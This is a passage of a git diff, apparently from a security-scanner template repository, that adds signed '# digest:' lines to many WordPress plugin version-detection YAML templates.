b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..2ade510bed 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c096b962ad91b485dadebf48659294d353c5715447da4d3c48254665c1d417bf022026dccc0f337d419bbe3e06e8460412424da902956a72dc9b6182230de8d1c07f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..09571935b0 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f89c22fbb092fe88ea4820c01227307cddf7e021ee5cd1df4e38325ced5440c4022100bafb8678867c12baa3001d43090b4859bfe53633fbabe6bb4b5bbd37aaec50b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..3d1ef851fc 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220758670388c344b04bdc2a8e26fc7dd27e1bd3c53bb72efde84bb97867c5ed726022100f6ad80219ebee0e668fa2973b8912ad3645c9f66e30f909b508c16f5ac4b3be1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..329f8b7168 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210081ed75233280330db434594ed985f7b1b99a7c43d6db94aef315cb37995fb91f02201e991b7de8a4bea9d05d1508d3796b4d65afcf8a59902215494ecf0d574cd4b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..59038309ca 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022050f11bb9902555a938cf0a79e7d706e117f106299367af51db958e012912f18f02201dac579a092e03039db2919a8da1e8bc93c78f057e60cc9c9e9ed8f713319d29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..1e854c2edf 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b4ccfe925c0cc49c098a4139a83f9012ca999afdb667e297dc8a36565f217e7e022100cb872fbfdb4940a2b6503bc04c2e9d2455412115e0abd53e14496131fffcfa70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..ad3c63fa1f 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205a5d630d99424bd42567a9aa82d5e668a919f50573f07db06684411e7499819402206210c10a5a28442321ea95135be32e27a988587bd8c5db984c8331bc84c00907:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8d7e45818b..3e70377c72 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022008daf9fa05f43df9ab85272965a1d9e7174e37549c49d7c8d9dd4f4d0badd300022100c7811460a3e6c18109edaa52ab9b075facf4e678e226d769e3c4d8e80935c9c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ed3967db7b..181961bcaa 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008cb47ed1163e4cf00272505ce79041b10f58d86583be3a3392c94ce6405d7c9c02207677b87550638ab9de3eddffc0d74a86928ce7eb8259275fb14de89e27b077a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 2ff5adba86..63a8a2d5c0 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022039cbbdb9ce6584cc516ca076bc3a638d3a0e0b484fb6f05f524f980c83722add022100c361e63ad0a72a132711e6c586b1bfc5b10a3704ae5d378e809ac6d2af4456da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 9099f3c0a5..10ded0f322 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d2b08c496917202db2dc5d6cc76788c3a091eb1de8ee8579046a5ad5f8237b34022025d45a3ec69a114be9de0be9d739ddd0112f9ed9090b8167f354b2b7bc262447:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 1ee0e67542..dc1e33610c 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100827112cc01ee159ef70fb8c1ea79cea140bf63793cf831073dcca5f5670b9ee2022100d0a3ea05ead6fa7a362a7e7532db2dd76397e41851cc18e4909900f83da6dbf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 1778552d75..cad82493ab 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fd25a37f43bdd8db268439079c0008b20fed95e48185bc04906e3e17c52de085022005940a364ab9f27e340c0b89e0daed746253fd319380281036d0b83866ceb7a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7ba81036cf..013140f82d 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e48d3d8b47799fe4487c94daf57163d1283b80e0017bfacd677bdac7a2a6bddf022100b87f78a6959f719eeca562868a06f2d5659aa2d73c5fb9d67e11adea16d521b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..9bbf8468dc 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220136e79db0d217ee2858ed8c1d5675d6a4871003996590bb204abd22f332f61ea022015d1c228ec8aea6a28d2a8c8fe5bce694eae10b39e69ba0258646ab654f6522b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 3e89505574..4a92035eb0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b797811f797adfe6c8725536e01912d9ae5d9a6e1540286360d345f85d27d18e02202ae80b3220814827150fa586594accf015a311f89d73bc40216210355da1fb18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..4d7667ae74 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008fac30cf48dbc20a146a6e7742cd8ce222c81c7db934f2f82d7faf36018720bb022100c19ba4940f2f6e153a46cc7175132e99027394bee8f28245de0c898eb3e4ffd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index c0cc5400a8..bc1afcf41e 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202cab0c7bd9d2b3a072433d145a80d719e259ddd8faf24c1c1dc316d0ed3db1da02201694771594dee9fbd51e20b6419728869d0f4ba3be57549f719e7c8d9d994642:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..7e24a5c714 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022001a0ec051dd1af618e988ea43b124a1dc0484d32e6277e5dc1f1597c20a136ed02201c8755b7d3608b285dc2e1e834f626250f84954698182f3db4b681483d08f301:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..702a08c417 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bb9deb10dd386c70ec00dd951e51b27685049a78bb3ed3f294ca51ead6d8c309022100d30bd379a357430ebac3fd5a0947d947b7c02a966eec6f630d43bef11959965b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..1183e32aea 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022023748f776e321fdd32b40c3941b40bd7ca1288b97dc691cc64dbf5ca380bf742022100bef9efec333f585ef8e3302ca9db7d5067ce595009e32096ed1dda599426beb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..f036902ee1 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204a0823d5c8c6f7ff9f9fa4aea43dd55b16271a18b9f8baf524d83b09839ff884022100b2c009aef3a1db07cdd78654cdb598ce6dcfbe888f31412451ad43da8236bdcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..68123dca7f 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205d93c18fdef4692ba05238b13ea390f4036d735dcb09c444a2b6235cbb76bb2302207bc3f5e2851d2612c0b929c6ae92f2443b4ddf87c480a6e6130a0d29556c1c61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..c69f583de1 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201ebcad1f27a3d493e1a4e4df3feeef3387ca7b96687b4537f60ac18060c0caf3022100ead072da01ed0bb545a105fcac8ca1321637aa3240feed6b596708c9d729f7a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..9201e7f386 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205b8059573901b2423f6e28a4343466892956194f967e6bfe092bd3a250e22a13022100cddd413ea12ebf4c620d295954f3126a86eee7edcff3cf8fd31a2f0ba92b0a05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..90ddebf357 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c4434653fec3122e237f6655138067ca66f716174faeb43190f1861be9214c8d02201d3cf5555f209045e57e08fbd49fe0d85ebb04206e3afbd1d24c7ec5ef846b98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..dd90a11b39 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008f4ed59f155a0dfddcfb8e4eea942e24b7027f1f1d53181c6306d235a552c4ea022009391d5f9d923ff5981e9aa24c7528af370e0e4f04e0e63b8becaa23d553357a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..5d90258369 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a9cd128b85067a0d6aa2d2e725c96b774f062760802ddb24e2a81a5b5123b4bd02201badc787e10865893db558855637ee50ed9d7511188080f0d27b0ac698705ee7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..33727aed9f 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b5307d57967a09160689ed28d73191f5582f31e8bee0651ad6a9790c53aeef9e0220206459e9faa433275889fe7e057e5328309b5a348a92a4a157447cfe3d9cd636:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 67f5eeae02..9d294fee10 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203c347b7750a618aa9a1561fb5451fed2c412845e0634fab12a7aa4cff8d8f55202204b8cc7525ea17e8cd5f2a98d19143a9a84844c9043a43f293535183d4e8dc712:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..0a9870129a 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210084922acc5025100fb11fa6053f33270a1ca6e8b32ddad49864a2eb2efc6fc2f6022061e6474fecf2cde65f7a0bf1fb5fdc464fb30b915fcaa6c01e3487dda0aa5e90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..baf86a5b17 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022032a68524a4e9bf06a7a6b120b4a7a86995205fd34176e60caadfe8cfcc98016d0220667b16d29b09e8a8dc77981370f471e5a7cff9f58e9a5b5eb3fe76e70fff7dbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..7adb50ac95 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206fcee3416bdbd6348cd3a0860b4259838fa8da84de9bf94865140f5809024eff02205800cfdc47d50b1210141882b4ca6b6c51592c2de1dec061c7a01b0c091ef05c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..a1d80ae053 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022044318c7e25980d3fef802f78e44c57d962ed967bfc2ecb1f2248b19afb8889d7022100c2b355d69b007a8d39182a42cfca66c0de9f98620ea2e6ca0f522d0c6c4c8b53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index fe5017885a..4376d7d492 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022002151935b96398d2fa2b3dddad288158ae80db0d62a8338651b8e6ccf011a17d02206fe03cfa36ce322e0fabe7903f5f92aaf6f71b7cb224b7e7802cc4195bf236ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index bbc305b8de..3301382961 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207972c8ddc1644b9f16bc70c377a3b55583d56c4ed8bd979b45cf56b9fa9d8e280220795eefbad9b2418e5b99a92e7932e449f10efe9f087990a1cecbe7ba991b68eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..eab7b4d592 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220252dd3483e61a094c11173b20ae7bc9f8fc9ffd1ce05da27ea890f87429d9016022100e16a699ea535c800ac7ab4864b09632328a1ef44f5a158989124059132625083:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..0419c64991 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202c0fe31e68c4d544d3a88cb236d8151a509df4e5b374042f0c12e13fae6ae115022100bfee02613be8bd7ff8b2711a8b417108b318849f6a5fc0340bf13bb0459c9656:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 953e4ab3d8..7f09649013 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a31b60eb96d14c10b3b44cfecb55daf5d59b4147bc38c349cba90359726a63b902202e793cb717311b3eee336c7a486e0c3ee1b583758b2fde6bb5a23be09e3314b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 92107fa69c..f00ae0163a 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220070fa26248b89ee6d865f6199747a2db243ba9d686eae698f3127f8640f19c030220313a14034ceb0871fac0c3ea94b0bc58155158b29d4c854d3c36d26e98b407ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..1638f6b641 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c2d1574b3b991265375f4cfaa5b3aeb33eb8886fa0b5785d80990016b0259e52022100935a30611562ace82e24373d41abb181cdc46accfc76eb690aeb232a8865197b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..ab8ca2ad80 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207bd7561508ec5dd8e7af0c32b0bb5982d0f05c21165e3c42cfeccd33fff1df8a022063dd1c3dbeee75ec7ea71c6bb1b22fa17a881b110e3bec33631ddbf9ea7bf2a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..48303df5d7 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d3a3c4f4ca39eaa531ed952e3288af1cd0a48580fc66b5b148fcd29da0a46ce902210096a94f1c35896be670b5a1017aa1e26f7348983f9ec585805f54fd1a50bb6c6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..361e620bb7 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220641bd0a6a956252dee349efca88a03a3a302a887e1c989c069963cf02e56541b022048785c23915123065d91a303744fde092e7ca15ba209fb7a366d81375b4c624c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 81f58198d3..a6ca6af31f 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022051f7fa02a65e11935f9b0bb86f2691eae09a286755698df122228ebb0458d9ec022100aa040409d42c0e3510a4478e83ed849f43bcffb41aac4a8da9423067a68078fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index d2a91ecce8..1430a92bcd 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202637e152b2b8ff0fdab13696aeac93e9a384f4184651f2b9ecaf9c075366cd4902203944b0c5009f24d18bf472f7856eb506d2f10961bf7ba65bbedde5751d36f10a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..032c4ac8e4 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b0c2d7207877794b01e622e2b1c53e79ca2e69f27e96a8cf996d219ca34f54e3022100d96a997255400b928da5ca29d83345e06596732aa3e56d4572dd689ea8b01267:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index e085f30e5a..35eb708bf9 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 